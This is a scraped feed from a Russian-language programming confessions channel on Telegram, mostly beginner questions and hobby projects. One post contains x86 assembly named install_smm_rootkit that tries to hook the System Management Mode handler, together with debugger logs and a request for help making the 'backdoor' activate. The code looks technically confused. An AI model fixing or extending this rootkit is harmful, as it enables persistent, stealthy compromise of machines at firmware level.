Programming confessions ✍️💻
830 subscribers
292 photos
33 videos
8 files
147 links
Анон @PRCF_AHOHNMHblN_BOT
Не анон @Pr0gramming_confessions_bot

что...? ты... идешь мыться? но--
Ч-ЧТО... КАК ТАК? БББЮ... ТЫ... ИДЕШЬ МЫТЬСЯ...
но как же так...?
Download Telegram
12👻4👾41🍓1
Три года я дружу с ассемблером и уже второй раз вспоминаю о мнемоническом правиле насчёт порядка аргументов, которым хотел бы поделиться

Не секрет, что в x86-64 аргументы системных вызовов передаются в регистрах в строго определённом порядке: rdi, rsi, rdx, r10, r8, r9. С помощью правила "Дима сидит рядом" можно запомнить порядок первых трёх регистров
ДИма – rDI
СИдит – rSI
РяДом – RDx
10💋21
всем пр, не раз в тт видел как кидаются дерьмом в так называемых "вайбкодеров" кто нибудь, объясните кто эти вайбкодеры ваще такие, и в чем их проблема🤔🤔
21
Привет. Нужна удобная библиотека на Python, чтобы скачать весь контент сайта с Wayback Machine. Если пользовались такими - скиньте ссылку пожалуйста. Мой любимый веб-комикс (точнее перевод на него) может пропасть..
21💋1💘1
привет начинатели и пробователи айти направленности

почему вы до сих пор пробователи и начинатели а не кто-то покруче?
👍211
Здраствуйте, можете подсказать какой язык лучше воспринимается на огэ? Ну тоесть может там программа проверяющая есть и она что-то хуже понимает
7
https://ozon.ru/t/ifzQLfj

Вопрос кто-то учил язык Lua по этой книге?
Есть смысл покупать?
🤔4💋1
как вообще начать изучать с#? я знаю ну кое-какие прям базо базовые знания по с++, но я просто не выкупаю как изучать языки
может посоветуете какие-нибудь курсы или книги вот чтоб прям для ТУПЫХ? 😭😭😭
This media is not supported in your browser
VIEW IN TELEGRAM
недели две назад у меня сломался мой супер калькулятор. я расплакался ибо я верный физмат (и к слову, никогда не программировал). и мне пришла в голову мысль, а что, если не покупать новый, а сделать его самому? ну вот такой калькулятор на ардуино у меня получился. зацените))
меня это оч завлекло и теперь у меня в мозге куча проектов. например я хочу сделать рацию (не через ардуино, а через настоящие приемник, антенну и т д). но это уже надо изучать радиотехнику.
я хочу научиться самостоятельно писать к ардуино коды, не залазя ни в какой сайт для подсказок. есть ли хорошие интернет-ресурсы, чтобы научится С++?
15
Реально можно ли в будущем работать по кибербез, пройдя курсы (ну и самостоятельно что-то делая)?
💋2
This media is not supported in your browser
VIEW IN TELEGRAM
Весело играюсь с новыми компонентами
Закину скетч, если кто-то захочет себе такое звуковое сопровождение, лол
Мб плату сделаю и спаяю, только надо микро почувствительнее найти и резисторы с меньшим сопротивлением заказать
💋63🥰2
global install_smm_rootkit

install_smm_rootkit:

mov ecx, 0x9E
rdmsr
mov [original_smi_handler], eax

mov eax, w_smi_handler
wrmsr

mov eax, 0xDEADBEEF
mov [trigger_address], eax

mov dx, 0xB2
mov al, 0xFE
out dx, al
ret


здравствуйте! ассемблер х86. обработчик не вызывается, бекдор устанавливается но не активируется. система выполняет стандартный обработчик а не мой.

логи

SMI: Handling SMI# 0xFE at vector 0x38
SMI: CPU0 entering SMM at 0x7E0000
SMI: CPU0 exiting SMM, total time 112us
SMI: Handler for code 0xFE completed successfully

динамический анализ

(gdb) x/10i install_smm_rootkit
0x7fffe001: mov $0x9e,%ecx
0x7fffe007: rdmsr
0x7fffe009: mov %eax,0x7fffe100
0x7fffe00e: mov $0x7fffe200,%eax
0x7fffe013: wrmsr
0x7fffe015: mov $0xdeadbeef,%eax
0x7fffe01a: mov %eax,0x7fffe104
0x7fffe01f: mov $0xb2,%dx
0x7fffe023: mov $0xfe,%al
0x7fffe025: out %al,(%dx)

(gdb) p /x $al
$1 = 0xfe

(gdb) si

отладчик

SMM_Debug: SMI# 0xFE triggered by I/O write to 0xB2
SMM_Debug: Executing default handler for SMI code 0xFE
SMM_Debug: Default handler: system maintenance
SMM_Debug: SMI processing completed, RSM executed

не понимаю где ошибка, может кто поможет? там, где спрашивал, к сожалению, проблему не нашли. гипотезы о регистрации в неправильном мср и неправильного адреса обработчика исключены
Есть тут кто учится на бизнес информатике? Как там с программированием, не слишком мало?
Есть вообще смысл поступать на это направление?
💋12👍5
Даров, родные, темка следующая — узнав от кента про то, что в нашей необьятной практикуют систему белых списков, созрел вопрос: а как, собсна эти белые списки в перспективе можно будет обходить?

Через дыры в разрешенных сервисах? Или искать альтернативные каналы связи?

Я, если честно, в политоте полный ноль и все новости до меня докатились только дня два-три назад, а кент как раз пророчит чуть ли не кванмён два дот ноль. Он, кстати, в политике столько же, сколько в интернете впринципе, поетому оснований верить у меня много, но в этот раз почему-то не особо хочется...
💋2
This media is not supported in your browser
VIEW IN TELEGRAM
Какая есть альтернатива Cloudflare? заебало уже постоянно считатся с их сбоями, в техподдержке как обычно либо нейронка, либо индус и оба невдупляют нихуя
💋7
Всем привет! Ищем двух человек для участия в геймджеме в Алмате! Ивент проходит оффлайн, поэтому нужны люди только из этого города. Один человек умеет чуть-чуть работать в годот, я же нулевая(сейчас изучаю с#). Мы идём чисто ради опыта и веселья, не ради победы
Пишите в анонку. Если есть вопросы, то задавайте http://t.me/anonaskbot?start=2hbce
👍2💋1
Hola, ребята, я собираюсь поступать на менеджера связанного с IT
Мне бы хотелось, что бы меня чему то научили. Сами понимаете, по школьной программе далеко не уедешь.
Можем перейти в лс, что хотите, но научите меня чему то классному и полезному

Неанон Лиша
💋2
Янезнаю, мне очень нужен человек, который поможет разобраться в С# в юнити. У меня уже голова трещит, конкурсы насилуют....
@mariyakhrest
2